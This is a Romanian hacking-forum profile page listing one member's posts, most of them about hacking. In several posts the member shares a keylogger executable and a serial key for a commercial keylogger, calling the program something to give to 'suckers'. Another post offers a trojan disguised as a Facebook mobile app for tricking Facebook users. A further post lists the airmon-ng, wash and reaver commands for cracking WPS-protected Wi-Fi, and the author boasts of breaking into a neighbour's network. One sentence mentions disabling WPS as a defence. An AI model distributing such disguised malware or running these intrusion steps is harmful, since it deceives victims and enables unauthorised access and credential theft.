Jump to content

Bratuleanu123

Members
  • Posts

    15
  • Joined

  • Last visited

About Bratuleanu123

  • Birthday 03/03/1994

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Bratuleanu123's Achievements

Newbie

Newbie (1/14)

19

Reputation

  1. GirlShare - Download Facebook application android.exe Keylogger executabilu care trebuie sa il dai la fraierii ! Ardamax Keylogger 3.9.2 Serial: Name: h3d1und 3r1k SE: 206B-2A3B-91A2 Fillezila .si dupa va faceti cont pe 1freehosting.com Bafta !
  2. Astazi ( 05.12.2014 ) Eu vreau sa ofer o licenta de Counter Strike 1.6 ( Steam ) Concursul este simplu ! -De la 1 ( inclusiv "1" ) la 70 ( inclusiv "70" ) un numar este cel castigator ! -Lasati un reply cu un numar , care vreti voi , cel care "ghiceste" primul numarul , sau este cel mai aproape de el , castiga licenta pentru Counter Strike 1.6 ! -Numarul este salvat la mine in PC intr-un fisier ".txt" ( am facut ss la "proprietati-le fisierului" si o sa mai fac un ss , la sfarsit , sa se vada k nu a fost modificat nimic in acel fisier ".txt" Imagine mai jos: View image: 2 -Jocul este la mine in inventar ( GIFT ) care va fi trimis pe mail , sau Steam Trade ! Imagine mai jos: View image: 1 Castigatorul , va fi anuntat de catre mine ( la final ) voi lua legatura cu el ( Y!M , Steam , Forum ) si va fi rugat ( dupa primirea jocului ) sa confirme ( in acest topic ) cum ca a primit licenta respectiva ! Concursul va fi valabil pana in data de: 12/12/2014 ! Reguli : - Un singur POST pe Cont ! ( Daca gasesc 2 sau mai multe , vor fi ignorate toate ) (Daca gasesc conturi multiple , la fel vor fi ignorate ! ) -Nu conteaza daca detii sau nu , deja o licenta Counter Strike ( Esti bine venit ) -Daca nu iti convine , sau gasesti un motiv intemeiat , cu care sa nu fi de acord cu acest concurs , te rog sa nu postezi nimic ( va fi sters ), imi poti trimite PM , si iti explic cat de bine pot ce si cum ! Bafta ! rstforums
  3. In linux kali intru cu LIVE -CD , si am pus la vrajeala Bratuleanu Hacker Anonymous! Conteaza ca i-am spart parola I-am scos eu parola are net la TP-LINK!
  4. Trebuie sa vina careva sa comenteze aiurea. Da stau si pe windows xp si am Yahoo messenger care este problema ta? Nu sunt Hacker , doar am venit cu o informatie cum se poate sparge parole WI-FI , de pe linux-kali nu se poate face PrtScr SynRq ca ti-as fi facut sa vezi cum se afla parole Am sa fac rost de un telefon si iti filmez sa vezi . Ca dovada poftim asa de inceput. (COCO). Wash v1.4 WiFi Protected Setup Scan Tool Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- EC:CB:30:67:C5:F8 6 00 1.0 No Orange-C5F4 5C:D9:98:E2:44:42 1 00 1.0 No zalenis 64:70:02:BF:11:20 1 00 1.0 No Home A0:F3:C1:7C:96:2A 6 00 1.0 Yes Magda ^C root@kali:~# Si nu mai comenta aiurea daca nu sti , daca vrei sa sti am 2 laptopuri , pe unu stau pe windows si pe unu rulez Linux-Kali . Si imi place sa ma documentez despre tot ce apartine de HACKING , daca iti dai cu parerea fa-o cu un scop nu fi IRONIC . Ca sa scriu randurile alea din TUtorial mi-a luat 10 minute . Conteaza ca am avut bunavointa sa postez ceva pe acest forum . Daca postam in Tutorial si o filmare cum se afla parolele WI-FI poate ca ma pupai in C*R . Dar cum tu folosesti Windows 98 sau XP ma mir ca ai auzit de Linux in 2014. Pune`ti Linux pe pc si fa tutoriale decat sa bati aiurea din gura ! Hai salut baietii! Uite ca se poate ! View image: untitled
  5. Iti arata in TERMINAL ! https://www.youtube.com/watch?v=VeL4dOFTpWU cand ii 100% .
  6. Cu linux-kali se poate sparge , acuma depinde si de conexiunea de internet pe care o ai . Daca ai norocu sa prinzi un modem de wi-fi - de la D-link sau TP-LINK in 5 minute 10 maxim afli parola de la WI-FI !
  7. Care sunt comenzile ? 1. airmon-ng pentru detectarea placii sau placilor de retea wireless 2. airmon-ng start wlan0 sau wlan1 in functie de cate placi de retea sunt si pe care vreti sa o folositi, placa intra in modul monitorizare 3. wash -i mon0 pentru detectare retele wireless, daca primiti eroare “Found packet with dab FCS, skipping…” incercati sa folositi comanda wash -i mon0 --ignore-fcs 4. reaver -i mon0 -b “aici bagati BSSID-ul” -d 0 -vv Acum nu va ramane decat sa aveti rabdare, cateva minute, ore sau….. Cum ne aparam de astfel de atacuri ? Simplu, dezactivam WPS (la TP-Link se numeste QSS) din router, acesta vine activat din fabrica pentru ca routerul sa obtina certificare WPS. Ca sa vezi, o chestie certificata de “specialisti” este o poarta permanent deschisa pentru hackeri… Pentru lenesi: Eu am incercat si cam dupa vreo 1 ora si jumatate am reusit sa sparg parola vecinulu . Dovada! View image: snapshot View image: untitled http://www.girlshare.ro/34177592.9
  8. Nu esti obligat sa folosesti programu meu Daca ai venit sa lasi niste comentarii fara un rost atunci fati tu un program !
  9. Cum am spus si mai jos , scopul meu nu este sa fac rau cuiva. Am spus si repet, este un TROJAN, dar nu face rau Pc-ului . Este un fel de generator de parole (Brute Force). Daca nu ma crezi eu il folosesc pe Linux-Kali din Live -CD! si merge perfect, acuma depinde cum ai norocu .Am sa vin cu tutoriale si mai interesante si ai sa vezi ca nu sunt cum poate ma crezi tu .
  10. Buna ziua,astazi am sa va prezint un program asemanator cu keylogger. Tot ce trebuie sa faceti este sa Downloadati programu de aici, vedeti ca este detectat ca si Trojan de virustotal dar nu este nici o problema in asta! Bun,dupa ce ati downlodat programu de aici >>> // Removed Intrati in iel si bagat Email si password la intamplare , odata ce ati introdus email si password la intamplare el va genera o lista de parole care sa fie asemanatoare cu emailu introdus de dvs! Eu am numit-o Mobile App Installs Ads deoarece o puteti da si celor de pe Facebook spunandu-le ca este o applicatie pentru Facebook Mobile! Nu vreau injuraturii ,am sa mai vin si cu alte tutoriale mai interesante aceasta este doar asa de inceput! . Scopul meu nu este sa fac rau cuiva , ci sa ajut oamenii care vor sa invete ceva despre HACK ...IT!
  11. Era clar ca nu a scris el aici , ii lua vreo 2 ore sa scrie cat ii acolo ! . Nu se mai posteaza nimica pe forumu asta ca inainte?
×
×
  • Create New...